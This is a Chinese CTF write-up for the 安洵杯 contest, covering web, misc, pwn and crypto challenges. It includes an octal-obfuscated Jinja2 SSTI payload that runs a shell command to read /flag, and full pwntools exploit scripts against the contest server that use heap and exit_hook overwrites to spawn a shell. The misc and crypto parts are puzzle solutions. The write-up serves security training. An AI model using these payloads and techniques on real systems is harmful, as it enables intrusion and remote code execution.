0RAYS-安洵杯writeup

阅读量    118200 |

分享到: QQ空间 新浪微博 微信 QQ facebook twitter

 

四川的比赛,Web好难,但是web手秒了pwn


Web

Normal ssti

ban了很多,考虑8进制绕过

payload

{%print(a|attr("\137\137\151\156\151\164\137\137")|attr("\137\137\147\154\157\142\141\154\163\137\137")|attr("\137\137\147\145\164\151\164\145\155\137\137")("\137\137\142\165\151\154\164\151\156\163\137\137")|attr("\137\137\147\145\164\151\164\145\155\137\137")("\145\166\141\154")("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\160\157\160\145\156\50\47\143\141\164\40\57\146\154\141\147\47\51\56\162\145\141\144\50\51"))%}

图片

 

Misc

签到

关注公众号,回复fl4g,得到

图片

下载得到一个flag.docx,里面有一串emoji,解码得到flag

图片

套娃

图片

下载文件得到一个hardzip.zip,里面还有一些只有几KB的密码文件,显然是CRC爆破,每个txt里的字符串长度均为2:

import zlib
import string
import itertools
yuan = 0xd6bb1bef
print(string.printable)
for i in itertools.product(string.printable, repeat=2):
    cc = ''.join(i)
    if yuan == zlib.crc32(cc.encode('utf-8')):
        print(cc)
        exit()

爆破完得到:

图片

最终压缩包密码即为:!qQIdEa@#!z)

解开hardzip.zip,得到一个easyzip.zip

用bandizip或者winrar可以看到3个文件,因为头文件错误的问题有些压缩包看不到。

图片

有两个CRC一模一样的文件,而且一个加密一个未加密,显然是明文攻击。

这里找软件很麻烦,最后用winrar成功

明文攻击得到压缩包密钥:%3#c$v!@

图片

解开压缩包得到flag.txt:

V20xa2NGa3hPV1ppYlRrd1lraDBkMk51WkdwWU1UazVXVmh2YlZreVZtaGFSMnhC

连续三次base64解码,得到:

fgic__notl{prwc__}az&ceadi@

传统型栅栏密码解密,key为3,解得:

flag{zip&crc_we_can_do_it}@

后面的@不要即为flag

王牌特工

下载压缩包得到一个findme文件

图片

可以分离出两个有用的文件,flagbox和key.txt

图片

key.txt里的数据为:

key:a_cool_key
use Veracrypt

下载Veracrypt,key为a_cool_key,解flagbox得到一个flag.txt:

图片

这里说要回头看看,猜测可能原文件里有隐藏的东西。用DiskGenius恢复findme文件,得到:

图片

把下面的密文用base64解码,得到:

真的密码:this_is_a_true_key

重新利用Veracrypt装载,得到realflag:

flag{you_are_a_cool_boy}

BeCare4

下载附件得到一个加密压缩包和一个npmtxt,用零宽字节解npmtxt里的字符串,解得:

oh,you found the pass:RealV1siBle

解开压缩包得到一张女孩子的图片,jpg隐写搞了一遍,最后用SilentEye
拖入SilentEye即可获得flag:

图片

 

PWN

web server

XRAY扫到了一个目录穿越漏洞,一把梭
有一说一还有一个webpwn也有这个洞,但是似乎ban了flag,但能读到passwd

图片

有一说一另一题

Einstein

json解析器name和passwd全错可以泄露libc,改exit_hook三个字节为one_gadget

#!/usr/bin/python

from pwn import *
import sys
context.log_level = 'debug'
context.arch='amd64'

local=0
binary_name='sfs'
libc_name='libc-2.23.so'
if local:
    p=process("./"+binary_name)
    libc=ELF("./"+libc_name)
else:
    p=remote('axb.d0g3.cn',20103)
    e=ELF("./"+binary_name)
    libc=ELF("./"+libc_name)

def z(a=''):
    if local:
        gdb.attach(p,a)
        if a=='':
            raw_input
    else:
        pass
ru=lambda x:p.recvuntil(x)
sl=lambda x:p.sendline(x)
sd=lambda x:p.send(x)
sa=lambda a,b:p.sendafter(a,b)
sla=lambda a,b:p.sendlineafter(a,b)
ia=lambda :p.interactive()
def leak_address():
    if(context.arch=='i386'):
        return u32(p.recv(4))
    else :
        return u64(p.recv(6).ljust(8,b'\x00'))

payload = '''
{
    "name": "a",
    "passwd": "b"
}
'''
payload = payload.replace('\n','')


def pwn():
    p.sendline(payload)
    p.recvuntil('logger:')
    p.recvuntil('logger:')
    libc_base = leak_address()-0x3c4b78
    print(hex(libc_base))
    if libc_base < 0x7f0000000000:
        return 0
    exit_hook1=libc_base+0x8f9f48
    one_gadget = libc_base+0xf0364
    a = p64(one_gadget)[0]
    p.send(p64(exit_hook1))
    p.send(p8(a))
    p.send(p64(exit_hook1+1))
    a = p64(one_gadget)[1]
    print(hex(one_gadget),p8(a))
    p.send(p8(a))
    p.send(p64(exit_hook1+2))
    a = p64(one_gadget)[2]
    print(hex(one_gadget),p8(a))
    p.send(p8(a))
    ia()

pwn()

IO_FILE

释放0x10的chunk避免干扰后iofile泄露libc,tcache改free_hook

#!/usr/bin/python
from pwn import *
import sys

context.log_level = 'debug'
context.arch='amd64'

local=0
binary_name='IO_FILE'
libc_name='libc.so.6'

libc=ELF("./"+libc_name)
e=ELF("./"+binary_name)

def z(a=''):
    if local:
        gdb.attach(p,a)
        if a=='':
            raw_input
    else:
        pass
ru=lambda x:p.recvuntil(x)
sl=lambda x:p.sendline(x)
sd=lambda x:p.send(x)
sa=lambda a,b:p.sendafter(a,b)
sla=lambda a,b:p.sendlineafter(a,b)
ia=lambda :p.interactive()

def leak_address():
    if(context.arch=='i386'):
        return u32(p.recv(4))
    else :
        return u64(p.recv(6).ljust(8,b'\x00'))

def cho(num):
    sla(">",str(num))

def add(size,content):
    cho(1)
    sla("size:",str(size))
    sa("description:",content)

def delete(idx):
    cho(2)
    sla("index:",str(idx))

while True:
    try:
        if local:
                p=process("./"+binary_name)
        else:
                p=remote('axb.d0g3.cn',20102)
        add(0x80,'a')
        add(0x10,'b')

        for i in range(8):
                delete(0)
        delete(1)

        add(0x70,'\x60\x77')
        add(0x80,'c'*8)
        add(0x80,p64(0xfbad1800) + p64(0)*3 + b'\x00')
        leak = u64(ru("\x7f")[-6:].ljust(8,b'\x00'))
        libcbase = leak - 0x3b68b0 #0x3ed8b0#
        free_hook = libcbase + libc.symbols['__free_hook']
        system = libcbase + libc.symbols['system']
        print(hex(libcbase))
        print(hex(free_hook))

        add(0x68,'1')#5
        add(0x20,'2')
        delete(5)
        delete(5)
        add(0x68,p64(free_hook))

        add(0x68,'/bin/sh\x00')
        add(0x68,p64(system))
        delete(8)

        ia()

        break
    except:
        p.close()

 

Crypto

爆破

import hashlib
l = '0123456789abcdef'
key = list(l)
ciphier = '0596d989a2938e16bcc5d6f89ce709ad9f64d36316ab80408cb6b89b3d7f064a'
broken_flag = 'd0g3{71b2b5616**2a4639**7d979**de964c}'
for i in range (len(key)):
    for j in range (len(key)):
        for a in range (len(key)):
            for b in range (len(key)):
                for c in range (len(key)):
                    for d in range (len(key)):
                        temp1 = key[i]+key[j]
                        temp2 = key[a]+key[b]
                        temp3 = key[c]+key[d]
                        flag = broken_flag[:14] + temp1 + broken_flag[16:22] + temp2 + broken_flag[24:29] + temp3 + broken_flag[31:]
                        flag1 = hashlib.sha256(flag.encode("utf-8"))
                        if flag1.hexdigest() == ciphier:
                            print(1)
                            print(flag)
                            break
#d0g3{71b2b5616ee2a4639a07d979ebde964c}

Easy aes

题目

#!/usr/bin/python
from Crypto.Cipher import AES
import binascii
from Crypto.Util.number import bytes_to_long
from flag import flag
from key import key
iv = flag.strip(b'd0g3{').strip(b'}')
LENGTH = len(key)
assert LENGTH == 16
hint = os.urandom(4) * 8
print(bytes_to_long(hint)^bytes_to_long(key))
msg = b'Welcome to this competition, I hope you can have fun today!!!!!!'
def encrypto(message):
    aes = AES.new(key,AES.MODE_CBC,iv)
    return aes.encrypt(message)
print(binascii.hexlify(encrypto(msg))[-32:])
'''
56631233292325412205528754798133970783633216936302049893130220461139160682777
b'3c976c92aff4095a23e885b195077b66'
'''

hint那里是有规律的,随机数实际解得”}4$d”
解得key = b’d0g3{welcomeyou}’

后面写脚本逆推

#!/usr/bin/python
from Crypto.Cipher import AES
import binascii
from Crypto.Util.number import bytes_to_long
import os
# from flag import flag
key = b'd0g3{welcomeyou}'
flag = "1" * 16
iv = flag.strip(b'd0g3{').strip(b'}')
LENGTH = len(key)
assert LENGTH == 16
hint = os.urandom(4) * 8
# print(bytes_to_long(hint)^bytes_to_long(key))
msg = b'Welcome to this competition, I hope you can have fun today!!!!!!'
def _xor(a, b):
    tmp = ""
    for i in range(len(a)):
        tmp += chr(ord(a[i]) ^ ord(b[i]))
    return tmp
def encrypto(message):
    aes = AES.new(key, AES.MODE_CBC, iv)
    return aes.encrypt(message)
def decrypto(message):
    aes = AES.new(key, AES.MODE_ECB)
    return aes.decrypt(message)
last_1 = '3c976c92aff4095a23e885b195077b66'.decode('hex')
last_1d = decrypto(last_1)
last_2 = _xor(last_1d, msg[-16:])
last_2d = decrypto(last_2)
last_3 = _xor(last_2d, msg[-32:-16])
last_3d = decrypto(last_3)
last_4 = _xor(last_3d, msg[-48:-32])
last_4d = decrypto(last_4)
last_5 = _xor(last_4d, msg[-64:-48])
print(last_5)

Easy rsa

下载得到奇怪名字的文件和奇怪的python文件,应该是替换,写个脚本恢复恢复结果如下

#!/usr/bin/python
from Crypto.Util.number import getPrime
import gmpy2
# --------------challenge 1-------------
p = getPrime(1024)
q = getPrime(1024)
e = getPrime(16)
n = p*q
phi = (q-1) * (p-1)
c = gmpy2.powmod(m,e,n)
hint1 = 2 * d + 246810 * e * phi
print(n)
print(c)
print(hint1)
# --------------challenge 2-------------
p = getPrime(4096)
r = getPrime(4096)
q = m
e = 0b10001
hint2 = bytes_to_long(hint2)
n = p*q*r
c = gmpy2.powmod(hint2,e,n)
print(n)
print(p)
print(c)
# --------------challenge 3-------------
m = bytes_to_long(flag)
q = getPrime(1024)
p = getPrime(1024)
n = q*p
e = 5
c = pow(m,e,n)
print(n)
print(c)

challenge1: iroot(pow(c,hint1,n),2)解得m,m是3得倍数,
challenge2,四因子rsa解得hint2,给了flag得高位,

challenge3:https://xz.aliyun.com/t/6459#toc-47Stereotyped message

exp如下

n = 10050095014547257781432719892909820612730955980465259676378711053379530637537082959157449310691856567584792956476780977871348290765339769265796235196183464082153542864869953748019765139619014752579378866972354738500054872580260903258315293588496063613299656519940131695232458799137629873477475091085854962677524091351680654318535417344913749322340318860437103597983101958967342493037991934758199221146242955689392875557192192462927253635018175615991531184323989958707271442555251694945958064367263082416655380103916187441214474502905504694440020491633862067243768930954759333735863069851757070183172950390134463839187
c = 522627051172673216607019738378749874116772877858344748349627321977492158105699887369893079581450048789131578556338186004983533975454988450450635141267157135506032849129152411194539350100279698888357898902460651973610161382266600081865609650174137113252711515464274593530115825189780860732147803369868525723790644619452538755225868382505974710418995847979384726953915873857530098330095151094837190566851416540540805185485212577333604309698822785682707412587829684108913753204398552196441996201678339688766979634246337855516220753995430266970473808724410357458278585135750810810484678948146374963838334596646926215341
hint1 = 134805774328615624446574490322803283547316698647214138487576352482438867186094276263735342558169004773286779632939369099910639984165263724781958841009573156241531958373198729926012152201548649349842790727259831232277600944618096069835436884888782994513452252257103877595707828731260669076400456300668581565291455061609385003064649522735776446930209884653223939689686840631001863143579575759834304817613040932998629846110770749941179601474484275548912570668460216633586988225562794026430881265344731575650165992321629617982004131413202026628777742093026476064486873565664625105013298396598413667761372217260994853420062861590358
from Crypto.Util.number import *
from gmpy2 import *
#hint1 = long_to_bytes(iroot(pow(c,hint1,n),2)[0])
m = iroot(pow(c,hint1,n),2)[0]
n = 133561991523711714238641512987809330530212246892569593026319411449791084194115873781301422593495806927875828290629679020098834182528012835469352471635087375406306534880352693134486855968468946334439553553593196889196239169351375517588892769598963002098115826389220099548938169095670740942251209102500450728442583559710183771974489284632651296188035458586935211952691589627681567274801028577256215269233875203212438263987034556969968774119389693056239796736659926866707857937025200924828822267781445721099763436020785585453958594470906716195030613615725126057391084801585533926767137218524047259398886392592317910204988634868663634415285507325190415658931169841182499733179254162060738994027842088553562013488445789594342451823783136881968032197575016845492231433684884872631894561254381663562267075103417879327236182565223877901300392217967589154857009356640377622996801781797109089687661697856930394706016954531077165127402008444818092498106642068414208190583373314287381712963712098566595399301400378116274132918572709221391531621228936206630829355801192700264684469488261781954165940553346889395507153750291402535330239420975542926664420153925171757944018621411265539452424569343708318070259746118326558005521868356304582694159507379335214599839668805877215983938986674084063185863612335339836810044252829401409522709997562887276661672718820881541500852400369184737236082178767653725044900394959369367604992512713490494168594433000695046297712977059205623777990102604073885527049867682390577577616773090662829024271568456346362315351643767420198116229892060385453123572533267805396437865025639093881944841521458804810097550625853182396288247815370818578103543117466070812804267915674186488979548392193291727228018246788487524292081389142018151246889408421936865224469589631518283230229213787648552632437566756058034131355439709320923876063030896228165897498746898125821639893238387694549304110003941329763552493326245073779912107372271854798616245416264801377068163622812994786201580895459712414134184992440395336131037558976058298521312536969408724436512019410835904564817724243688308776888170183074838453466914170790840559860531933430176605716828492670093771129301541861534595181565621644268739349035133062776852304594204220291667924128313579203359827093150911871520605180797438668872585571501531844999598674037998642821148417473110716470439750642781609483016636419373004760601783594025036152924259863627732874940148083408474700265895269165869619971810103499607445649821
p = 689159326758330864205993810270646658558112329195746149991184055909755461246626153920231796960903018393806410715812453949253930576368274228434916375544579284365205241766136566047482065208442992856658212126772417415403473480889927931481129434854332858754668120563818975006384512615022532233244596546830392476321031156328699572283946257730515089543367929326280871305776349305346159311591820455943842203357066465523558715870586535188343603460826231817622511283563179065036619023415848694281294463836320838105950552498785365535923041927491743402053568747113507098917091780797009380675587381805253390649630338055131031679595664055361678114747608302944715308343764678875659039394225950479683967885912291399162609094622980318391045105733088508798371414996479107970975717563552614856114065668728607215268431341079233630995168600896375314067716366181300081684353583326214062788182429536300917720999423489104723824360299238754986351169209709892739317096741609428484854087163771300777717883057028145424827875496235567904291417092378448353222179114362314382900648079547647848024440220204768433974038004942869937932015294078073975703156613070125753344841550872429670559866184492945262960524545894823245933714684747784492095876370443994948425495841
c = 65553658155452064459040687299632299415295760116470555100400688788937893101658136830409082198753928673469636810831761104117535054304536941814523449491308187105740319828511969750359402834799486354958723098881095067882833993358468923611118977258293638107874383059048015701807718209929028151240509801801995570592890519253676774278321334154528938199389248563657673061299152526380072934917964488153875744843855913524788571997024947738868563951687976817548296078497817264410193882661874749304071168979787307490320366615899942861059615405569154961435894469325778407081182151320629413711622905703628430999201763846682516985530373643176026602901129520439581385946775511292435206913016381293219606333035648747877313424616408338829137581998558399694071257787294948211441360283876078405831210625321012072477187438320944119825970347654743794743846351762763177440045084761025728597526592892602263484022280653040195670941221493307430623213388669939114424884078502946247136016528925968280034099568454876076717790529204207317485416329062672971939549478648687894958552760953682796211975576320713576155031581257782352223857605149825435939889497465805857339911597479498085071301601506276220487493620870555545057189236870008182212284992968466451864806648279032294546676543599599279519394341289357968292292966055189578253350591765186079486142930848439238134776982658066494378507873003509820326863340562093906137812952544399266821679905073464535234547335867090392493005792528534561846391285698943396889671437127470587837989050518266365099789392584686615435440486086402941357614369171354355307532351370775920044953381482310949663868493911752104873824099597326393857349237228788875273525189373323552519106738497767546337587947368062413334887230166285909705065920918078052826480092129173127887307158867274895914733110276134124505178182548094607594799978378381804502097507167978950926067243870989514735314054362049917668015341349933704885009878192354865067520219676784278082055728039064858769077997521541853184489175120623176481708269464933868222226748491078319156602229948646960513946846417957356535995079525993783278312017766715177078804065822913241465133977233398851120059496221650357891946344151601586169979516826622503491746992282716591488199657450776596383692706657692673860134555990821730412919497018889046615548520878486492644159735144935329502984929679831356967030870226422768447430410031028770529758721438528263719267616233686813781828066547393953352033364851486926368090757420184816634373721
q = m
e = 0x10001
#hint2 = bytes_to_long(hint2)
#n = p*q*r
from sympy import isprime
r = (n//q)//p
#print q
#print isprime(q)
assert r*p*q == n
print "pass"
q = q//3
s = 3
print isprime(q),isprime(p),isprime(r),isprime(s)
phi = (p-1)*(r-1)*(q-1)*(s-1)
d = inverse(e,phi)
#pow(c,d,n)
a = pow(c,d,n)
print a.bit_length()
print long_to_bytes(pow(c,d,n))
n = 14857387925078594782296815160632343246361073432459148990826882280149636079353743233970188012712079179396872746334143946166398665205889211414809061990804629906990919975187761209638578624750977626427334126665295876888197889611807587476285991599511809796600855689969285611439780660503760599419522224129074956376232480894299044645423966132497814477710701209588359243945406653547034819927990978087967107865071898215805154003530311865483912924517801551052430227039259201082691698480830966567550828053196299423168934840697637891311424286534363837640448614727396254288829197614805073711893711252067987576745683317789020760081
c = 14035143725862612299576867857272911865951893239411969382153274945929406881665641140566462510177132511558933111728871930062074990934496715765999564244916409345156132996227113853067808126894818934327468582686975383715892108247084995817427624992232755966398834682079985297050358462588989699096264155802168300026093598601350106309023915300973067720164567785360383234519093637882582163398344514810028120555511836375795523327469278186235781844951253058134566846816114359878325011207064300185611905609820210904126312524631330083758585084521500322528017455972299008481301204209945411774541553636405290572228575790342839240414
_m=11239443406846515682004397310032293056196968050880696884154193656922259582646354037672076691689208477252910368708578177585615543361661522949580970926775441873118707711939955434559752380028881505457190152150478041765407640575502385319246850488337861927516356807100066882854088505873269444400308838674080495033363033991690519164414435127535585042743674610057871427247713644547353814013986225161074642240309387099685117406015368485154286173113005157000515600312732288515034433615484030112726976498694980213882676667079898254165734852012201534408980237760171665298653255766622300299965621344582683558980205175837414319653422202527631026998128129244251471772428535748417136102640398417683727976117490109918895485047
e = 0x5
b=_m * (10 ** 54)
kbits=180
PR.<x> = PolynomialRing(Zmod(n))
f = (x + b)^e-c
x0 = f.small_roots(X=2^kbits, beta=1)[0]
from Crypto.Util.number import *
print ( (b+x0)^e-c == 0 )
print(long_to_bytes(int(b)+int(x0)))
分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读
|发表评论
|评论列表
加载更多